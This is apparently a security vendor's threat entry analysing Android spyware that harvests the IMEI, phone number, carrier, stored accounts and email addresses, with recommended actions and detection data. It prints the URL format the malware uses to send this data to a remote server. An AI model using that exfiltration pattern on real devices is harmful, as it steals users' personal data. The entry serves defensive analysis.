Android/SndApp.A!tr.spy

description-logoAnalysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends to a remote web server several personal information including the email addresses of the victim.
The application displays a splash screen such as Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy
If you press the icon on the top right corner, a list of affiliate apps are shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.


Technical Details


When the malware is launched, it collects:
  • phone's IMEI
  • phone number
  • network country iso (e.g "fr")
  • operator's name
  • accounts memorized on the mobile phone. This corresponds to all web accounts an end-user has his/her phone memorize so that he/she does not need to enter his/her credentials at each login. For instance, this can be Google accounts, Facebook accounts, e-Commerce accounts etc.
  • emails: emails of the victim. Actually, those emails are collected from the login names specified in the accounts above. When a login name looks like an e-mail (e.g it has an @ inside), the malware assumes it is an email, and collects it.
This information is sent to a remote web site:
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
When pressing the icon for affiliate applications, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirect to the related applications.

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extreme
FortiClient
Extended
FortiMail
Extended
FortiSandbox
Extended
FortiWeb
Extended
Web Application Firewall
Extended
FortiIsolator
Extended
FortiDeceptor
Extended
FortiEDR

Version Updates

Date Version Detail
2019-08-07 70.54800